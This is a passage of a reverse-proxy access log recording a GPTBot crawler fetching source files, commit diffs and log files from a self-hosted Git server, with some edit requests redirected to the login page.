Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 11117] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 10516] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 10695] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 10695] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 10516] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 923896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:14:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:14:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 3774907] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 310973] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 159348] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-3_access.log" [Client 74.7.227.38] [Length 21922] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-4_access.log" [Client 74.7.227.38] [Length 24188] [Gzip 5.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-1_access.log" [Client 74.7.227.38] [Length 19086] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-2_access.log" [Client 74.7.227.38] [Length 21323] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11390] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12042] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11390] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11592] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?files=C%2b%2bProject" [Client 74.7.227.38] [Length 15194] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" +[17/Feb/2026:16:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11909] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" +[17/Feb/2026:16:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2f.vscode%2ftasks.json" [Client 74.7.227.38] [Length 25949] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:16:15:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" +[17/Feb/2026:16:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/package.json" +[17/Feb/2026:16:15:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/tsconfig.json" +[17/Feb/2026:16:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/tsconfig.json" +[17/Feb/2026:16:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:16:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:16:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10439] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:16:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:16:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10678] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:16:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10440] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:16:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11910] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" +[17/Feb/2026:16:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14287] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13013] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" +[17/Feb/2026:16:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" +[17/Feb/2026:16:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16164] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 